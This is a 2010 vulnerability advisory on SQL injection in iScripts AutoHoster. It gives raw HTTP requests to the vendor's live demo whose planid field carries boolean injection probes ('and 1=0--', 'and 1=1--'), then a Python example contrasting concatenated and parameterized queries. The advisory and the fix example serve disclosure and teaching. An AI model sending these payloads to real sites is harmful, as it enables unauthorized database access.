iScripts AutoHoster SQL injection Vulnerabilities

2010.07.02
Credit: Sangteamtham
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

$-------------------------------------------------------------------------------------------------------------------
$ iScripts AutoHoster SQL injection Vulnerabilities
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download : http://www.iscripts.com/autohoster/
$ Date : 02/07/2010
$ Email : sangteamhtham@gmail.com
$****************
$Exploit:
$
$ Code:
****************
Host: www.iscripts.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.iscripts.com/autohoster/demo/compareplans.php?id=4
Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=autohoster
Content-Type: application/x-www-form-urlencoded
Content-Length: 82

postback=H&id=4&selecteddomain=&domainid=&planid=12 and 1=0--&domopt=H&ddomain=hcegroup.net&tld=biz
****************
Host: www.iscripts.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.iscripts.com/autohoster/demo/compareplans.php?id=4
Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=autohoster
Content-Type: application/x-www-form-urlencoded
Content-Length: 82

postback=H&id=4&selecteddomain=&domainid=&planid=12 and 1=1--&domopt=H&ddomain=hcegroup.net&tld=biz
$****************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$--------------------------------------------------------------------------------------------------------------------
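The two request bodies above differ only in the boolean appended to planid (1=0 versus 1=1). The following added example, which is not AutoHoster's code, shows why a concatenated query answers them differently while a validated, parameterized lookup treats both the same; the plans table, the function names and the use of SQLite as a stand-in database are assumptions.

```python
import sqlite3
from urllib.parse import parse_qs

# POST body layout taken from the advisory; only the planid value varies.
TEMPLATE = ("postback=H&id=4&selecteddomain=&domainid=&planid={}"
            "&domopt=H&ddomain=hcegroup.net&tld=biz")
BODY_FALSE = TEMPLATE.format("12 and 1=0--")   # from the advisory
BODY_TRUE = TEMPLATE.format("12 and 1=1--")    # from the advisory
BODY_NORMAL = TEMPLATE.format("12")            # constructed benign request

def make_db():
    # Constructed stand-in schema; the real AutoHoster tables are not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE plans (id INTEGER PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO plans VALUES (12, 'demo-plan')")
    return db

def planid_of(body):
    # Decode the form body the way a server-side framework would.
    return parse_qs(body, keep_blank_values=True)["planid"][0]

def lookup_concatenated(db, body):
    # Vulnerable pattern: the parameter becomes part of the SQL text,
    # so "and 1=0--" / "and 1=1--" change the WHERE clause itself.
    sql = "SELECT name FROM plans WHERE id = " + planid_of(body)
    return db.execute(sql).fetchall()

def lookup_hardened(db, body):
    # Hardened pattern: strict integer check, then a bound parameter.
    raw = planid_of(body)
    if not (raw.isascii() and raw.isdigit()):
        raise ValueError("planid must be a decimal integer")
    return db.execute("SELECT name FROM plans WHERE id = ?",
                      (int(raw),)).fetchall()

def outcome(lookup, db, body):
    # Normalise results so the two lookups can be compared side by side.
    try:
        return lookup(db, body)
    except ValueError:
        return "rejected"

if __name__ == "__main__":
    db = make_db()
    for label, body in (("1=0", BODY_FALSE), ("1=1", BODY_TRUE), ("plain", BODY_NORMAL)):
        print(label, outcome(lookup_concatenated, db, body),
              outcome(lookup_hardened, db, body))
```

A differing response to the 1=0 and 1=1 bodies is the signal that the parameter reaches the query unescaped; after the fix both are rejected before any SQL runs.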

